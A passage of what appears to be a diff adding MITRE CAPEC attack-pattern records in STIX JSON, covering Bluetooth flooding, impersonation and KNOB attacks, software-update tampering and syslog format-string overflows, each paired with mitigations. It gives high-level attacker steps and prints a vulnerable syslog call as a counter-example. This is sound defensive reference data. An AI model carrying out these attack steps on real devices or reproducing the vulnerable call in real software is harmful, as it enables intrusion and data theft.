Thunderbolt 2 system port", + "id": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25053510-6191-4eb9-928f-471d5618f597", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable PCIe tunneling to set Security Level to SL3", + "id": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae02655e-7790-4816-8ebd-c5291df0de36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Boot Camp upon MacOS systems", + "id": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.", + "external_references": [ + { + "external_id": "CAPEC-666", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/666.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Amrita Mitra, What is BlueSmack Attack?, 2017--03---08, The Security Buddy", + "external_id": "REF-655", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-bluesmack-attack/" + } + ], + "id": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BlueSmacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for Bluetooth Enabled Devices: Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.

    2. Techniques
    Note the MAC address of the device you want to attack.

Experiment

  1. Change L2CAP Packet Length: The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.

    2. Techniques
    An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux.

Exploit

  1. Flood: An adversary sends the packets to the target device, and floods it until performance is degraded.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application has Bluetooth enabled." + ], + "x_capec_skills_required": { + "Low": "An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth when not being used.", + "id": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cf51b79-b6f1-4956-b6cc-c945dbe525c1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80201cde-dfb2-4b73-bfb8-7f01b83d2d4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

    2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth in public places.", + "id": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b477928d-f597-4e68-8812-a8bc335d9bfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify incoming Bluetooth connections; do not automatically trust.", + "id": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51b85277-07df-4319-8d21-1fef2587765e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default PIN passwords and always use one when connecting.", + "id": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e6624f4-6e7b-4594-8b02-e56c9aca7173", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.", + "external_references": [ + { + "external_id": "CAPEC-668", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/668.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Data Manipulation: Transmitted Data Manipulation", + "external_id": "T1565.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1565/002" + }, + { + "description": "Jovi Umawing, Bluetooth vulnerability can be exploited in Key Negotiation of Bluetooth (KNOB) attacks, 2019--08---21, MalwareBytes", + "external_id": "REF-657", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/awareness/2019/08/bluetooth-vulnerability-can-be-exploited-in-key-negotiation-of-bluetooth-knob-attacks/" + } + ], + "id": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Key Negotiation of Bluetooth Attack (KNOB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery: Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.

    2. Techniques
    Use packet capture tools.

Experiment

  1. Change the entropy bits: Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded.

Exploit

  1. Capture and decrypt data: Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Person in the Middle network setup." + ], + "x_capec_resources_required": [ + "Bluetooth adapter, packet capturing capabilities." + ], + "x_capec_skills_required": { + "Medium": "Ability to modify packets." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device.", + "id": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-668-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7a3fb48-d2a9-46e6-b2e1-3e971c6ab1d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "target_ref": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary with access to an organization’s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software’s normal functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-669", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/669.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alteration of a Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify software with frequent updates: The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure.

Experiment

  1. Gain access to udpate infrastructure: The adversary must then gain access to the organization's software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access.

Exploit

  1. Alter the software update: Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have penetrated an organization’s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems." + ], + "x_capec_skills_required": { + "High": "Skills required include the ability to infiltrate the organization’s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b27d91b7-66f1-4a0d-a25b-c73cadad30b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3576f50-4c2f-4c57-855a-1f4b066ac7ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.", + "external_references": [ + { + "external_id": "CAPEC-67", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/67.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Format String", + "external_id": "06", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "scut, team teso, Exploiting Format String Vulnerabilities", + "external_id": "REF-503", + "source_name": "reference_from_CAPEC", + "url": "http://doc.bughunter.net/format-string/exploit-fs.html" + }, + { + "description": "Halvar Flake, Auditing binaries for security vulnerabilities", + "external_id": "REF-504", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt" + }, + { + "description": "Fortify Taxonomy of Vulnerabilities, Fortify Software", + "external_id": "REF-505", + "source_name": "reference_from_CAPEC", + "url": "https://vulncat.hpefod.com/en" + }, + { + "description": "Syslog man page", + "external_id": "REF-506", + "source_name": "reference_from_CAPEC", + "url": "http://www.rt.com/man/syslog.3.html" + } + ], + "id": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "modified": "2022-09-29T00:00:00.000Z", + "name": "String Format Overflow in syslog()", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote adversaries to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

    2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.
    The formatting character %n is useful for adding extra data onto the buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--68dcbb61-cb52-4b46-944a-9941a87a33bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f3d05ec-6c33-4384-aaa5-d2227378e659", + "modified": 